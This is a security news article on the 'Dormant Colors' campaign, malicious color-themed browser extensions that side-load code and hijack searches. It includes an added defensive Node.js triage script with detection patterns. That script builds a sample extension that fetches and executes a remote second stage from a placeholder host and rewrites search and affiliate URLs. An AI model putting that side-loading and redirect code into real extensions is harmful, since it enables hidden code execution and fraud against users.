Malicious Google Chrome extensions with over a million installs hijack users' browsers

The security research team at Guardio Labs has uncovered a malvertising campaign that distributes browser extensions which hijack users' searches and inject links into the web pages they visit.

The extensions present themselves as harmless add-ons that let the user customize the colors of web pages. At install time they contain no malicious code that a store reviewer or the user's device could detect; the malicious logic is loaded later from the operators' servers. This combination of an initially dormant payload and color-themed add-ons is why Guardio named the campaign Dormant Colors.

As of October 15th, 2022, Guardio counted thirty variants of the extension on the Chrome Web Store and the Microsoft Edge Add-ons store, with more than a million installs between them.

The infection begins with malvertising: while trying to watch a video or download a file, the user is served an ad or a page redirect. Clicking it leads to a page claiming that an extension must be installed before the user can continue.

Once the user accepts the prompt and installs the extension, the browser is redirected through a series of pages that load the malicious code and tell the extension what to do next. This post-install side-loading is what keeps the code in the store listing clean.

When search hijacking is active, the extension routes the user's search queries through pages controlled by the operators, who earn revenue from the ads shown there and from selling the collected search data. The extension does not stop there: it also watches browsing across a list of more than 10,000 sites and, when the user lands on one of them, redirects to the same page with an affiliate identifier embedded in the URL.
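As an added example (not Guardio's code and not taken from the Dormant Colors extensions), the Node.js script below does the static triage a practitioner would run on an unpacked extension: it parses the manifest for over-broad permissions and a content security policy that allows a remote script-src, and scans the scripts for the two behaviours described above, fetching and executing code after install and rewriting search or shopping navigation. The sample extension files are constructed inline so the script runs offline; the domains, file names and the `operator-20` affiliate tag in them are placeholders, not indicators from the real campaign.

```javascript
// Static triage of an unpacked browser extension (added example; constructed sample below).
// Flags (1) code side-loaded after install and (2) search / affiliate navigation rewriting.

const REMOTE_CODE_PATTERNS = [
  { id: 'eval',               re: /\beval\s*\(/g },
  { id: 'new-function',       re: /\bnew\s+Function\s*\(/g },
  { id: 'remote-script-tag',  re: /\.src\s*=\s*['"`]https?:\/\//gi },
  { id: 'dynamic-import-url', re: /\bimport\s*\(\s*['"`]https?:\/\//gi },
  { id: 'fetch-remote-js',    re: /\bfetch\s*\(\s*['"`]https?:\/\/[^'"`]*\.js\b/gi },
];

const NAV_HIJACK_PATTERNS = [
  { id: 'search-url-match',    re: /\b(google|bing|yahoo|duckduckgo)\.com\/search\b/gi },
  { id: 'affiliate-param',     re: /[?&](tag|aff_id|affid|affiliate|ref)=/gi },
  { id: 'tab-redirect',        re: /\bchrome\.tabs\.update\s*\(/g },
  { id: 'webrequest-redirect', re: /\bredirectUrl\s*:/g },
];

// Permissions that let an extension observe or rewrite every page and request.
const RISKY_PERMISSIONS = new Set([
  'webRequest', 'webRequestBlocking', 'tabs', 'webNavigation', '<all_urls>', '*://*/*',
]);

// 1-based line number of character offset `idx` in `text`.
function lineOf(text, idx) {
  return text.slice(0, idx).split('\n').length;
}

// Run every pattern over one source file; one finding per match.
function scanSource(file, text, patterns, category) {
  const findings = [];
  for (const { id, re } of patterns) {
    re.lastIndex = 0;                      // patterns are global; reset per file
    let m;
    while ((m = re.exec(text)) !== null) {
      findings.push({ file, category, id, line: lineOf(text, m.index) });
    }
  }
  return findings;
}

function scanManifest(manifest) {
  const findings = [];
  const declared = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of declared) {
    if (RISKY_PERMISSIONS.has(p)) findings.push({ file: 'manifest.json', category: 'permission', id: p, line: 0 });
  }
  // A CSP whose script-src names a remote origin is what lets extension pages load code later.
  const csp = manifest.content_security_policy;
  const cspText = typeof csp === 'string' ? csp : JSON.stringify(csp || {});
  if (/script-src[^;]*https?:\/\//i.test(cspText)) {
    findings.push({ file: 'manifest.json', category: 'csp', id: 'remote-script-src', line: 0 });
  }
  return findings;
}

// files: { 'manifest.json': string, '<name>.js': string, ... } as read from the unpacked directory.
function triageExtension(files) {
  let findings = scanManifest(JSON.parse(files['manifest.json']));
  for (const [name, text] of Object.entries(files)) {
    if (!name.endsWith('.js')) continue;
    findings = findings.concat(
      scanSource(name, text, REMOTE_CODE_PATTERNS, 'remote-code'),
      scanSource(name, text, NAV_HIJACK_PATTERNS, 'nav-hijack'),
    );
  }
  return findings;
}

// Constructed sample (hypothetical domains and tag): a "color" extension whose installed code
// only fetches a second stage days later; stage2.js stands in for the payload captured afterwards.
const SAMPLE_EXTENSION = {
  'manifest.json': JSON.stringify({
    manifest_version: 2, name: 'Color Picker (constructed sample)', version: '1.0',
    permissions: ['tabs', 'webRequest', 'webRequestBlocking', '<all_urls>'],
    content_security_policy: "script-src 'self' https://cdn.example-update.invalid; object-src 'self'",
    background: { scripts: ['background.js'] },
  }),
  'background.js': [
    "// looks like a theme helper at install time",
    "const THEME = { accent: '#3366ff' };",
    "setTimeout(async () => {",
    "  const r = await fetch('https://cdn.example-update.invalid/stage2.js');",
    "  new Function(await r.text())();   // executes the side-loaded payload",
    "}, 3 * 24 * 3600 * 1000);",
  ].join('\n'),
  'stage2.js': [
    "// stand-in for the fetched payload",
    "chrome.webRequest.onBeforeRequest.addListener(d => {",
    "  if (d.url.startsWith('https://www.google.com/search')) {",
    "    return { redirectUrl: 'https://search.operator.invalid/?q=' + new URL(d.url).searchParams.get('q') };",
    "  }",
    "}, { urls: ['<all_urls>'] }, ['blocking']);",
    "chrome.tabs.onUpdated.addListener((id, info, tab) => {",
    "  if (tab.url && tab.url.includes('amazon.com/') && !tab.url.includes('tag=')) {",
    "    chrome.tabs.update(id, { url: tab.url + '&tag=operator-20' });",
    "  }",
    "});",
  ].join('\n'),
};

for (const f of triageExtension(SAMPLE_EXTENSION)) {
  console.log(`${f.file}:${f.line} [${f.category}] ${f.id}`);
}
```

The pattern list is a heuristic, not a verdict: an innocent extension can legitimately use `tabs` or `chrome.tabs.update`, and a payload that arrives only after installation will never be in the directory you unpack from the store. The finding that matters most for this campaign is therefore the combination of a remote origin in `script-src` or a `fetch` of a remote `.js` with a delayed execution path, which is exactly the part a store review of the installed files does not see.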

If the user then makes a purchase through such a URL, the operators collect the affiliate commission. The malware is not currently going after credentials, but Guardio warns that the same side-loading mechanism could just as easily deliver code that steals login credentials, takes over online banking sessions or reads personal files. No such activity has been observed so far; the concern is that an extension which enters undetected and fetches its instructions later can be repurposed at any time. Many of the campaign's domains have already been taken down by the relevant authorities, yet the operators keep coming back under a new web page or a new domain.
